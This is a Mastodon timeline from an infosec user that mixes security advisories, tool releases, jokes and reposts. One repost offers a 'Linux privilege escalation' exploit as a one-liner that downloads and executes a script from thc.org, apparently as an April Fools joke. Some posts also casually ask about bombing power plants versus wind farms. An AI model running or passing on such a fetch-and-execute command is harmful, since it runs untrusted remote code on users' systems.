Posts
2583
Following
624
Followers
1380
"I'm interested in all kinds of astronomy."
buherator
repeated
chrisdavidmills@front-end.social

Chris Mills

New on MDN, I've documented all-new, fully-customizable <select> elements: https://developer.mozilla.org/en-US/docs/Learn_web_development/Extensions/Forms/Customizable_select. Thanks to everyone who provided reviews!

0
3
0
buherator

buherator

Reply to @mttaggart@infosec.exchange
@mttaggart @TheDFIRReport BR has pretty neat evasion capabilities that you'd have to develop for CS. CS on the other hand is more "operator friendly"...
1
0
1
buherator
repeated
cR0w@infosec.exchange

cR0w cascadia

Patch your Mozilla things. They released an advisory for Firefox and Thunderbird with four sev:HIGH vulns.

https://www.mozilla.org/en-US/security/advisories/mfsa2025-20/

CVE-2025-3028: Use-after-free triggered by XSLTProcessor

CVE-2025-3031: JIT optimization bug with different stack slot sizes

CVE-2025-3032: Leaking file descriptors from the fork server

CVE-2025-3029: URL bar spoofing via non-BMP Unicode characters

CVE-2025-3035: Tab title disclosure across pages when using AI chatbot

CVE-2025-3033: Opening local .url files could lead to another file being opened

CVE-2025-3030: Memory safety bugs fixed in Firefox 137, Thunderbird 137, Firefox ESR 128.9, and Thunderbird 128.9

CVE-2025-3034: Memory safety bugs fixed in Firefox 137 and Thunderbird 137

0
2
0
buherator

buherator

Reply to @algernon@come-from.mad-scientist.club
@algernon Crawlers be like
1
1
4
buherator
repeated
algernon@come-from.mad-scientist.club

algernon ludd

New iocaine & new template deployed. It looks great!

  • Fancy markov-generated title!
  • Beautiful CSS!
  • Still can speak with some JS help!
  • Minified output!
  • QR code with alt text, all garbage!
  • Hungarian content on the demo page! (until I restart iocaine again)

https://poison.madhouse-project.org/

2
1
0
buherator
repeated
skelsec@bird.makeup

SkelSec

well then

0
1
0
buherator

buherator

[RSS] Harnessing the power of Named Pipes

https://cybercx.co.nz/blog/harnessing-the-power-of-named-pipes/
0
0
1
buherator
repeated
_r_netsec@infosec.exchange

/r/netsec

When parameterization fails: SQL injection in Nim's db_postgres module using parameterized queries https://blog.nns.ee/2025/03/28/nim-postgres-vulnerability/

0
2
0
buherator
repeated
davidgerard@circumstances.run

David Gerard

UK government cuts funds for actually-working anti-cancer AI

https://pivot-to-ai.com/2025/03/31/uk-government-cuts-funds-for-actually-working-anti-cancer-ai/ - text
https://www.youtube.com/watch?v=he0dAvl37BY - video

0
4
0
buherator

buherator

Reply to @joxean@mastodon.social
re: #warfare
Show content
@joxean You mean the power lines/transformers? If so, are these expensive enough to outweigh differences in power plant rebuilding costs? I mean even if you rebuild the distribution system you'd still be in trouble if there's nothing to hook up to, but maybe the distribution is much more costly than the plant so it doesn't matter? On the other hand, how many men, bombs, planes, etc. do you need to wipe a distributed vs. monolithic system?
1
0
0
buherator

buherator

Sourcetrail 2025.4.1 released:

https://github.com/petermost/Sourcetrail/releases/tag/2025.4.1
0
2
2
buherator

buherator

Periodic reminder that the rr-project (time-traveling gdb) is alive and kicking:

https://rr-project.org/
0
9
16
buherator
repeated
fzer0@nerdculture.de

A Light Shining in Darkness

Vibe Wizards will never understand.

4
13
0
buherator

buherator

#warfare
Show content
How does it compare in difficulty to destroy a coal plant vs wind farm by bombardment?
3
0
0
buherator
repeated
rc2014@oldbytes.space

RC2014

I read a report recently that confirmed that straight PCB traces, right angle, and orthogonally placed components can actually make electrons sad and slow them down. They much prefer the excitement of whizzing along curvy traces, particularly if they end up going in to a chip at a random angle. And bright colours really make them want to work harder.

So I will be updating all kits with design philosophy. The first to be done is the RC2014 Mini II Picasso. You can pick one up now at
https://z80kits.com/shop/rc2014-mini-ii-picasso/

15
5
0
buherator

buherator

Reply to @algernon@come-from.mad-scientist.club
@algernon Damn you make it harder to resist installing this thing every day!
0
0
3
buherator

buherator

I was foolish enough to link to a Twitter thread in an old slide deck. It's not on IA.

Are there any alternatives where I can look up the tweet?

#bitrot #digitalpreservation #archiving
0
0
0
buherator

buherator

Reply to @thc@infosec.exchange
@thc :)
0
0
1
buherator
repeated
thc@infosec.exchange

The Hacker‘s Choice

Edited yesterday

💥CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):

“. <(curl -SsfL https://thc.org/7350pipe)”

3
4
0
buherator
repeated
spendergrsec@bird.makeup

Brad Spengler

https://lore.kernel.org/linux-cve-announce/2025032721-CVE-2023-53032-70ce@gregkh/T/#u "Note that it's harmless since the value will be checked at the next step." Sure, but our Bash script has determined this will get a CVE anyway: https://web.git.kernel.org/pub/scm/linux/kernel/git/lee/vulns.git/tree/scripts/cve_review#n192

0
1
0
Show older
About infosec.place

Terms of Service

This is a placeholder, overwrite this by putting a file at 

$STATIC_DIR/static/terms-of-service.html

See the Static Directory docs for more info.